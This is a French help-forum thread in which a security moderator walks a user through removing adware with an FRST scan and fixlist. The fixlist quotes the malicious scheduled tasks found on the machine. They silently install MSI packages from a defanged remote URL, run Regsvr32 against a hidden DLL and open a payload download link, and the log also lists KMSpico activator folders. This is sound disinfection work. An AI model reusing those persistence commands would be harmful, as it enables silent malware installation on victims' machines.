Nombreuses pubs ave Counterflix
Résolu/Fermé
coco
-
14 avril 2017 à 18:08
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 15 avril 2017 à 11:30
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 15 avril 2017 à 11:30
A voir également:
- Nombreuses pubs ave Counterflix
- Supprimer les pubs - Guide
- Bloquer les pubs sur youtube - Guide
- Www.facebook.com vous a redirigé à de trop nombreuses reprises - Forum Facebook
- Vous avez utilisé ce numéro de téléphone à de trop nombreuses reprises ✓ - Forum Gmail
- Pubs netflix - Guide
7 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
14 avril 2017 à 18:17
14 avril 2017 à 18:17
Salut,
En général, cet adware modifie les serveurs DNS.
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
En général, cet adware modifie les serveurs DNS.
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Merci pour la réponse. Voici les liens
FRST: http://pjjoint.malekal.com/files.php?id=FRST_20170414_8l13e13f14l5
Additionnal: http://pjjoint.malekal.com/files.php?id=20170414_i11t9i5j10m7
Shortcut: http://pjjoint.malekal.com/files.php?id=20170414_y13l11r12z10t8
FRST: http://pjjoint.malekal.com/files.php?id=FRST_20170414_8l13e13f14l5
Additionnal: http://pjjoint.malekal.com/files.php?id=20170414_i11t9i5j10m7
Shortcut: http://pjjoint.malekal.com/files.php?id=20170414_y13l11r12z10t8
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
14 avril 2017 à 18:53
14 avril 2017 à 18:53
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
Fais un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Refais un scan FRST et donne les nouveaux rapports via pjjoint
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
HKLM\...\Providers\igt9hqh9: C:\Program Files (x86)\Ghocacultreererle Renew\local64spl.dll [307200 2017-04-12] ()
ShellExecuteHooks: Pas de nom - {0A767F30-1B4A-11E7-9EAE-64006A5CFC23} - C:\Users\marie\AppData\Roaming\Rersertainthigert\Goceshlooward.dll -> Pas de fichier
R2 WinSAPSvc; C:\Users\marie\AppData\Roaming\WinSAPSvc\WinSAP.dll [553984 2017-04-13] (winsap) [Fichier non signé]
Task: {42D44F24-B3E3-4ACB-BB65-498261F77651} - System32\Tasks\Samsung Update => msiexec /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=TOSHIBAXMQ01ABF050_Y6AAWY4GTXXY6AAWY4GT&d=20170413 /q
Task: {939C7363-BBA0-497E-92F8-BE606FE94625} - System32\Tasks\{E21D9614-55B6-21BF-78F6-CAF1C954CF75} => C:\ProgramData\{388509B7-8F2E-BE1C-96A1-C87EF0BFE242}\FB0BD259-4CA0-65F2-9F2D-87952A6C2DB3.exe [2017-04-13] () <==== ATTENTION
Task: {E7BB8A02-8A0E-4330-9F5B-CCDD98902C78} - \{0E780B47-7D78-7F7D-7F11-0C0B0C0B117D} -> Pas de fichier <==== ATTENTION
Task: {7423053E-F968-44C5-98F7-A809B27281FF} - System32\Tasks\Popuspclerdersh => "msiexec" /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=TOSHIBAXMQ01ABF050_Y6AAWY4GTXXY6AAWY4GT&d=20170412 /q
Task: {9673A367-DA57-4639-A26C-71353D910C28} - System32\Tasks\{7D2DAACC-0707-A7B1-D24D-6F8AEBED1F16} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\c7cee0d\56616606.dll" <==== ATTENTION
Task: {AA7A94A8-5911-42B0-8F08-D6477D70E6B6} - System32\Tasks\PPI Update => C:\windows\explorer.exe "hxxp://insightcdn.online/download/index.php?mn=9995" <==== ATTENTION
2017-04-14 14:26 - 2017-04-14 14:26 - 01129376 _____ (Google Inc.) C:\Users\marie\Downloads\ChromeSetup (1).exe
2017-04-13 23:51 - 2017-04-13 23:51 - 00000000 ___HD C:\.~BT
2017-04-13 21:53 - 2017-04-13 21:53 - 00000000 ___HD C:\
2017-04-13 21:42 - 2017-04-13 21:53 - 00000000 ____D C:\ProgramData\c7cee0d
2017-04-13 21:42 - 2017-04-13 21:42 - 00003972 _____ C:\windows\System32\Tasks\{E21D9614-55B6-21BF-78F6-CAF1C954CF75}
2017-04-13 21:42 - 2017-04-13 21:42 - 00003878 _____ C:\windows\System32\Tasks\{7D2DAACC-0707-A7B1-D24D-6F8AEBED1F16}
2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\8a6f4dd3-7d35-0
2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\8a6f4dd3-35f1-0
2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\{689522dd-712c-1}
2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\{5b8e6739-012c-0}
2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\{56614b2a-512c-1}
2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\{4d0a2888-312c-0}
2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\{388509B7-8F2E-BE1C-96A1-C87EF0BFE242}
2017-04-13 14:32 - 2017-04-13 14:32 - 00000000 ____D C:\Users\marie\AppData\Local\UNP
2017-04-13 13:38 - 2017-04-13 14:00 - 00005344 _____ C:\windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for LAPTOP-UP611ITJ-marie LAPTOP-UP611ITJ
2017-04-13 11:54 - 2017-04-13 11:54 - 00004072 _____ C:\windows\System32\Tasks\Samsung Update
2017-04-13 08:13 - 2017-04-13 23:53 - 00000000 ____D C:\Program Files\UNP
2017-04-13 08:05 - 2017-04-13 08:05 - 00000000 ____D C:\Users\marie\AppData\Local\SNARE
2017-04-13 08:05 - 2017-04-13 08:05 - 00000000 ____D C:\Users\marie\AppData\Local\Kitty
2017-04-13 08:04 - 2017-04-13 22:11 - 00000000 ____D C:\Users\marie\AppData\Local\AMD
2017-04-13 08:04 - 2017-04-13 11:54 - 00003676 _____ C:\windows\System32\Tasks\Milimili
2017-04-13 08:04 - 2017-04-13 11:54 - 00003590 _____ C:\windows\System32\Tasks\Windows-PG
2017-04-13 08:04 - 2017-04-13 11:54 - 00000000 ____D C:\Users\marie\AppData\Roaming\WinSAPSvc
2017-04-13 08:04 - 2017-04-13 08:45 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-13 08:04 - 2017-04-13 08:04 - 00000000 ____D C:\Users\marie\AppData\Local\SNARER
2017-04-13 08:04 - 2017-04-13 08:04 - 00000000 ____D C:\Update
2017-04-13 08:00 - 2017-04-13 11:54 - 00000000 ____D C:\Program Files\MK
2017-04-13 08:00 - 2017-04-13 08:00 - 00000000 ____D C:\Program Files (x86)\MK
2017-04-13 07:59 - 2017-04-13 07:59 - 00000000 ____D C:\Program Files (x86)\igt9hqh9
2017-04-12 20:44 - 2017-04-12 08:31 - 00532136 ____N (Microsoft Corporation) C:\windows\system32\MpSigStub.exe
2017-04-12 20:39 - 2017-04-12 20:39 - 00002664 _____ C:\Users\marie\Desktop\Word 2013.lnk
2017-04-12 20:39 - 2017-04-12 20:39 - 00002660 _____ C:\Users\marie\Desktop\PowerPoint 2013.lnk
2017-04-12 20:23 - 2017-04-12 20:23 - 00564112 _____ C:\Users\marie\Downloads\favoris_12_04_2017.html
2017-04-12 20:06 - 2017-04-12 20:06 - 00004608 _____ C:\windows\SECOH-QAD.exe
2017-04-12 20:06 - 2017-04-12 20:06 - 00003584 _____ C:\windows\SECOH-QAD.dll
2017-04-12 20:05 - 2017-04-12 20:48 - 00000000 ____D C:\Program Files\KMSpico
2017-04-12 19:50 - 2017-04-13 21:58 - 00000000 ____D C:\Program Files (x86)\Mjeward
2017-04-12 19:50 - 2017-04-12 20:08 - 00000000 ____D C:\Users\marie\AppData\Roaming\Rersertainthigert
2017-04-12 19:50 - 2017-04-12 19:51 - 00000000 ____D C:\Users\marie\AppData\Local\Ghuitainshgesh
2017-04-12 19:50 - 2017-04-12 19:50 - 00006124 _____ C:\windows\System32\Tasks\Ghocacultreererle Renew
2017-04-12 19:50 - 2017-04-12 19:50 - 00006106 _____ C:\windows\System32\Tasks\Popuspclerdersh
2017-04-12 19:50 - 2017-04-12 19:50 - 00000000 ____D C:\Program Files (x86)\Ghocacultreererle Renew
2017-04-12 19:40 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\f9addfc5-6b95-1
2017-04-12 19:40 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\f9addfc5-1057-0
2017-04-12 19:39 - 2017-04-13 22:43 - 00000000 ____D C:\Program Files (x86)\Windows Loader
2017-04-12 19:39 - 2017-04-12 19:39 - 00003628 _____ C:\windows\System32\Tasks\PPI Update
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
Fais un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Refais un scan FRST et donne les nouveaux rapports via pjjoint
Voici les nouveaux liens:
shortcut: http://pjjoint.malekal.com/files.php?id=20170414_h14b11u87s11
FRST: http://pjjoint.malekal.com/files.php?id=FRST_20170414_t14i14n13n15b10
Additionnal: http://pjjoint.malekal.com/files.php?id=20170414_b12p14c11l5y12
shortcut: http://pjjoint.malekal.com/files.php?id=20170414_h14b11u87s11
FRST: http://pjjoint.malekal.com/files.php?id=FRST_20170414_t14i14n13n15b10
Additionnal: http://pjjoint.malekal.com/files.php?id=20170414_b12p14c11l5y12
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
14 avril 2017 à 23:27
14 avril 2017 à 23:27
y a du mieux ou pas ?
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
15 avril 2017 à 11:30
15 avril 2017 à 11:30
cool =)
Supprime le dossier C:\FRST
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
Quelques conseils :
Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)
Supprime le dossier C:\FRST
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
Quelques conseils :
Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)
